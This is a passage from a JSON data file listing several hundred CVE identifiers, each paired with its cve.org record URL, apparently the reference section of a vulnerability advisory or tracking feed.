"url": "https://www.cve.org/CVERecord?id=CVE-2024-56744"
},
{
"name": "CVE-2025-38491",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38491"
},
{
"name": "CVE-2026-3783",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-3783"
},
{
"name": "CVE-2022-49161",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49161"
},
{
"name": "CVE-2021-21240",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-21240"
},
{
"name": "CVE-2022-48771",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48771"
},
{
"name": "CVE-2025-37961",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37961"
},
{
"name": "CVE-2025-23131",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23131"
},
{
"name": "CVE-2024-27400",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27400"
},
{
"name": "CVE-2023-52485",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52485"
},
{
"name": "CVE-2025-40309",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40309"
},
{
"name": "CVE-2022-49997",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49997"
},
{
"name": "CVE-2022-49469",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49469"
},
{
"name": "CVE-2025-6075",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6075"
},
{
"name": "CVE-2025-38408",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38408"
},
{
"name": "CVE-2026-23179",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23179"
},
{
"name": "CVE-2025-68334",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68334"
},
{
"name": "CVE-2025-40343",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40343"
},
{
"name": "CVE-2025-38644",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38644"
},
{
"name": "CVE-2025-38692",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38692"
},
{
"name": "CVE-2022-0480",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0480"
},
{
"name": "CVE-2025-68173",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68173"
},
{
"name": "CVE-2024-49932",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49932"
},
{
"name": "CVE-2026-23090",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23090"
},
{
"name": "CVE-2026-23035",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23035"
},
{
"name": "CVE-2023-53209",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53209"
},
{
"name": "CVE-2023-54253",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54253"
},
{
"name": "CVE-2025-38127",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38127"
},
{
"name": "CVE-2025-22103",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22103"
},
{
"name": "CVE-2025-1272",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1272"
},
{
"name": "CVE-2025-21658",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21658"
},
{
"name": "CVE-2022-49651",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49651"
},
{
"name": "CVE-2025-68307",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68307"
},
{
"name": "CVE-2025-40308",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40308"
},
{
"name": "CVE-2024-26770",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26770"
},
{
"name": "CVE-2023-54324",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54324"
},
{
"name": "CVE-2024-27041",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27041"
},
{
"name": "CVE-2025-36184",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36184"
},
{
"name": "CVE-2026-3195",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-3195"
},
{
"name": "CVE-2025-37743",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37743"
},
{
"name": "CVE-2025-40005",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40005"
},
{
"name": "CVE-2025-37920",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37920"
},
{
"name": "CVE-2024-56326",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56326"
},
{
"name": "CVE-2023-26242",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26242"
},
{
"name": "CVE-2025-58185",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58185"
},
{
"name": "CVE-2025-40315",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40315"
},
{
"name": "CVE-2023-52673",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52673"
},
{
"name": "CVE-2024-56722",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56722"
},
{
"name": "CVE-2021-33113",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-33113"
},
{
"name": "CVE-2022-48668",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48668"
},
{
"name": "CVE-2024-27418",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27418"
},
{
"name": "CVE-2025-68231",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68231"
},
{
"name": "CVE-2021-22930",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-22930"
},
{
"name": "CVE-2025-14177",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-14177"
},
{
"name": "CVE-2026-23064",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23064"
},
{
"name": "CVE-2025-38591",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38591"
},
{
"name": "CVE-2025-68806",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68806"
},
{
"name": "CVE-2022-50322",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50322"
},
{
"name": "CVE-2023-50782",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-50782"
},
{
"name": "CVE-2022-27635",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-27635"
},
{
"name": "CVE-2025-71098",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71098"
},
{
"name": "CVE-2024-49922",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49922"
},
{
"name": "CVE-2020-12317",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-12317"
},
{
"name": "CVE-2025-61731",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61731"
},
{
"name": "CVE-2025-40251",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40251"
},
{
"name": "CVE-2024-42128",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42128"
},
{
"name": "CVE-2025-71078",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71078"
},
{
"name": "CVE-2024-49909",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49909"
},
{
"name": "CVE-2025-40355",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40355"
},
{
"name": "CVE-2021-42771",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-42771"
},
{
"name": "CVE-2026-2391",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-2391"
},
{
"name": "CVE-2021-4095",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-4095"
},
{
"name": "CVE-2022-50240",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50240"
},
{
"name": "CVE-2025-40054",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40054"
},
{
"name": "CVE-2024-45015",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45015"
},
{
"name": "CVE-2025-68184",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68184"
},
{
"name": "CVE-2024-36357",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36357"
},
{
"name": "CVE-2025-71074",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71074"
},
{
"name": "CVE-2025-38673",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38673"
},
{
"name": "CVE-2025-40107",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40107"
},
{
"name": "CVE-2025-11234",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-11234"
},
{
"name": "CVE-2025-71083",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71083"
},
{
"name": "CVE-2026-23061",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23061"
},
{
"name": "CVE-2023-53447",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53447"
},
{
"name": "CVE-2024-46754",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46754"
},
{
"name": "CVE-2021-0161",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-0161"
},
{
"name": "CVE-2018-1121",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-1121"
},
{
"name": "CVE-2022-49547",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49547"
},
{
"name": "CVE-2025-66863",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66863"
},
{
"name": "CVE-2025-0622",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0622"
},
{
"name": "CVE-2023-0286",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0286"
},
{
"name": "CVE-2024-26757",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26757"
},
{
"name": "CVE-2024-49899",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49899"
},
{
"name": "CVE-2022-49484",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49484"
},
{
"name": "CVE-2024-40900",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-40900"
},
{
"name": "CVE-2024-46748",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46748"
},
{
"name": "CVE-2025-68813",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68813"
},
{
"name": "CVE-2024-50164",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50164"
},
{
"name": "CVE-2026-27137",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27137"
},
{
"name": "CVE-2023-53248",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53248"
},
{
"name": "CVE-2024-56788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56788"
},
{
"name": "CVE-2016-8660",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-8660"
},
{
"name": "CVE-2024-26691",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26691"
},
{
"name": "CVE-2026-23047",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23047"
},
{
"name": "CVE-2025-22121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22121"
},
{
"name": "CVE-2024-1975",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-1975"
},
{
"name": "CVE-2025-38215",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38215"
},
{
"name": "CVE-2025-7519",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7519"
},
{
"name": "CVE-2023-53491",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53491"
},
{
"name": "CVE-2025-68365",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68365"
},
{
"name": "CVE-2024-57804",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57804"
},
{
"name": "CVE-2024-49908",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49908"
},
{
"name": "CVE-2025-68265",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68265"
},
{
"name": "CVE-2024-50048",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50048"
},
{
"name": "CVE-2026-28421",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-28421"
},
{
"name": "CVE-2026-23119",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23119"
},
{
"name": "CVE-2025-37943",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37943"
},
{
"name": "CVE-2025-21918",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21918"
},
{
"name": "CVE-2025-37745",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37745"
},
{
"name": "CVE-2025-71085",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71085"
},
{
"name": "CVE-2026-27171",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27171"
},
{
"name": "CVE-2022-50811",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50811"
},
{
"name": "CVE-2025-13837",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-13837"
},
{
"name": "CVE-2023-4133",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4133"
},
{
"name": "CVE-2024-50183",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50183"
},
{
"name": "CVE-2025-38734",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38734"
},
{
"name": "CVE-2023-53366",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53366"
},
{
"name": "CVE-2022-49910",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49910"
},
{
"name": "CVE-2024-27062",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27062"
},
{
"name": "CVE-2022-49203",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49203"
},
{
"name": "CVE-2024-40918",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-40918"
},
{
"name": "CVE-2024-27032",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27032"
},
{
"name": "CVE-2022-50236",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50236"
},
{
"name": "CVE-2024-35932",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35932"
},
{
"name": "CVE-2024-35839",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35839"
},
{
"name": "CVE-2025-68344",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68344"
},
{
"name": "CVE-2026-23137",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23137"
},
{
"name": "CVE-2025-40347",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40347"
},
{
"name": "CVE-2025-71154",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71154"
},
{
"name": "CVE-2025-37882",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37882"
},
{
"name": "CVE-2024-35971",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35971"
},
{
"name": "CVE-2024-46762",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46762"
},
{
"name": "CVE-2023-34983",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-34983"
},
{
"name": "CVE-2024-35868",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35868"
},
{
"name": "CVE-2023-53323",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53323"
},
{
"name": "CVE-2026-3731",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-3731"
},
{
"name": "CVE-2025-40198",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40198"
},
{
"name": "CVE-2024-0760",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0760"
},
{
"name": "CVE-2025-39942",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39942"
},
{
"name": "CVE-2025-68310",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68310"
},
{
"name": "CVE-2026-23222",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23222"
},
{
"name": "CVE-2025-68229",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68229"
},
{
"name": "CVE-2023-52857",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52857"
},
{
"name": "CVE-2024-42107",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42107"
},
{
"name": "CVE-2025-68257",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68257"
},
{
"name": "CVE-2025-39929",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39929"
},
{
"name": "CVE-2022-50304",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50304"
},
{
"name": "CVE-2026-23226",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23226"
},
{
"name": "CVE-2020-26146",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-26146"
},
{
"name": "CVE-2024-43844",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43844"
},
{
"name": "CVE-2023-52920",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52920"
},
{
"name": "CVE-2023-52590",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52590"
},
{
"name": "CVE-2025-71084",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71084"
},
{
"name": "CVE-2024-22025",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22025"
},
{
"name": "CVE-2026-23049",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23049"
},
{
"name": "CVE-2025-68321",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68321"
},
{
"name": "CVE-2021-0072",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-0072"
},
{
"name": "CVE-2025-40190",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40190"
},
{
"name": "CVE-2025-69652",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-69652"
},
{
"name": "CVE-2025-21635",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21635"
},
{
"name": "CVE-2025-37924",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37924"
},
{
"name": "CVE-2022-40133",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-40133"
},
{
"name": "CVE-2020-26143",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-26143"
},
{
"name": "CVE-2025-21712",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21712"
},
{
"name": "CVE-2025-38353",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38353"
},
{
"name": "CVE-2025-36009",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36009"
},
{
"name": "CVE-2019-0154",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-0154"
},
{
"name": "CVE-2024-57982",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57982"
},
{
"name": "CVE-2023-52761",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52761"
},
{
"name": "CVE-2022-49773",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49773"
},
{
"name": "CVE-2023-53609",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53609"
},
{
"name": "CVE-2023-53478",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53478"
},
{
"name": "CVE-2024-42117",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42117"
},
{
"name": "CVE-2025-23160",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23160"
},
{
"name": "CVE-2023-53682",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53682"
},
{
"name": "CVE-2026-23229",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23229"
},
{
"name": "CVE-2025-40311",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40311"
},
{
"name": "CVE-2025-54770",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-54770"
},
{
"name": "CVE-2026-3442",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-3442"
},
{
"name": "CVE-2024-58238",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58238"
},
{
"name": "CVE-2024-13176",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-13176"
},
{
"name": "CVE-2025-68814",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68814"
},
{
"name": "CVE-2025-22039",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22039"
},
{
"name": "CVE-2025-37842",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37842"
},
{
"name": "CVE-2025-39933",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39933"
},
{
"name": "CVE-2025-40237",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40237"
},
{
"name": "CVE-2022-49722",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49722"
},
{
"name": "CVE-2026-23745",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23745"
},
{
"name": "CVE-2025-68780",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68780"
},
{
"name": "CVE-2024-35945",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35945"
},
{
"name": "CVE-2025-39990",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39990"
},
{
"name": "CVE-2025-15467",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-15467"
},
{
"name": "CVE-2025-71081",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71081"
},
{
"name": "CVE-2023-53780",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53780"
},
{
"name": "CVE-2020-35501",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35501"
},
{
"name": "CVE-2024-58251",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58251"
},
{
"name": "CVE-2025-38710",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38710"
},
{
"name": "CVE-2025-9820",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9820"
},
{
"name": "CVE-2023-52624",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52624"
},
{
"name": "CVE-2024-56557",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56557"
},
{
"name": "CVE-2022-49699",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49699"
},
{
"name": "CVE-2022-50700",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50700"
},
{
"name": "CVE-2023-52632",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52632"
},
{
"name": "CVE-2024-46836",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46836"
},
{
"name": "CVE-2026-23101",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23101"
},
{
"name": "CVE-2026-23099",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23099"
},
{
"name": "CVE-2024-38556",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38556"
},
{
"name": "CVE-2025-1180",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1180"
},
{
"name": "CVE-2025-38060",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38060"
},
{
"name": "CVE-2022-48929",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48929"
},
{
"name": "CVE-2025-55130",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55130"
},
{
"name": "CVE-2025-36070",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36070"
},
{
"name": "CVE-2024-46820",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46820"
},
{
"name": "CVE-2025-39770",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39770"
},
{
"name": "CVE-2025-38105",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38105"
},
{
"name": "CVE-2025-37744",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37744"
},
{
"name": "CVE-2025-38705",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38705"
},
{
"name": "CVE-2023-53198",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53198"
},
{
"name": "CVE-2023-53846",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53846"
},
{
"name": "CVE-2025-71121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71121"
},
{
"name": "CVE-2024-35942",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35942"
},
{
"name": "CVE-2022-1247",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1247"
},
{
"name": "CVE-2025-40333",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40333"
},
{
"name": "CVE-2022-50234",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50234"
},
{
"name": "CVE-2025-38082",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38082"
},
{
"name": "CVE-2025-37884",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37884"
},
{
"name": "CVE-2024-58054",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58054"
},
{
"name": "CVE-2024-49934",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49934"
},
{
"name": "CVE-2025-39750",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39750"
},
{
"name": "CVE-2025-38022",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38022"
},
{
"name": "CVE-2026-23066",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23066"
},
{
"name": "CVE-2025-38562",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38562"
},
{
"name": "CVE-2023-4969",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4969"
},
{
"name": "CVE-2024-50098",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50098"
},
{
"name": "CVE-2024-35946",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35946"
},
{
"name": "CVE-2023-44487",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-44487"
},
{
"name": "CVE-2023-53789",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53789"
},
{
"name": "CVE-2022-49858",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49858"
},
{
"name": "CVE-2025-39692",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39692"
},
{
"name": "CVE-2024-35959",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35959"
},
{
"name": "CVE-2023-5363",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5363"
},
{
"name": "CVE-2025-36428",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36428"
},
{
"name": "CVE-2023-53520",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53520"
},
{
"name": "CVE-2026-23085",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23085"
},
{
"name": "CVE-2023-52737",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52737"
},
{
"name": "CVE-2025-40360",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40360"
},
{
"name": "CVE-2026-23209",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23209"
},
{
"name": "CVE-2025-71136",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71136"
},
{
"name": "CVE-2024-35803",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35803"
},
{
"name": "CVE-2025-22105",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22105"
},
{
"name": "CVE-2024-8612",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8612"
},
{
"name": "CVE-2023-52586",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52586"
},
{
"name": "CVE-2025-40332",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40332"
},
{
"name": "CVE-2021-46195",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-46195"
},
{
"name": "CVE-2025-68354",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68354"
},
{
"name": "CVE-2025-68801",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68801"
},
{
"name": "CVE-2021-33110",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-33110"
},
{
"name": "CVE-2025-37834",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37834"
},
{
"name": "CVE-2025-21833",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21833"
},
{
"name": "CVE-2025-40082",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40082"
},
{
"name": "CVE-2019-19378",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-19378"
},
{
"name": "CVE-2026-23150",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23150"
},
{
"name": "CVE-2024-40972",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-40972"
},
{
"name": "CVE-2025-61985",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61985"
},
{
"name": "CVE-2025-71073",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71073"
},
{
"name": "CVE-2025-38426",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38426"
},
{
"name": "CVE-2025-38436",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38436"
},
{
"name": "CVE-2024-36911",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36911"
},
{
"name": "CVE-2025-55131",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55131"
},
{
"name": "CVE-2025-40104",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40104"
},
{
"name": "CVE-2024-36917",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36917"
},
{
"name": "CVE-2025-38097",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38097"
},
{
"name": "CVE-2026-23236",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23236"
},
{
"name": "CVE-2023-53068",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53068"
},
{
"name": "CVE-2025-22090",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22090"
},
{
"name": "CVE-2025-61919",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61919"
},
{
"name": "CVE-2021-31615",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-31615"
},
{
"name": "CVE-2024-1737",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-1737"
},
{
"name": "CVE-2025-40097",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40097"
},
{
"name": "CVE-2022-49932",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49932"
},
{
"name": "CVE-2022-25837",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-25837"
},
{
"name": "CVE-2025-68258",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68258"
},
{
"name": "CVE-2024-49939",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49939"
},
{
"name": "CVE-2025-38239",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38239"
},
{
"name": "CVE-2024-49905",
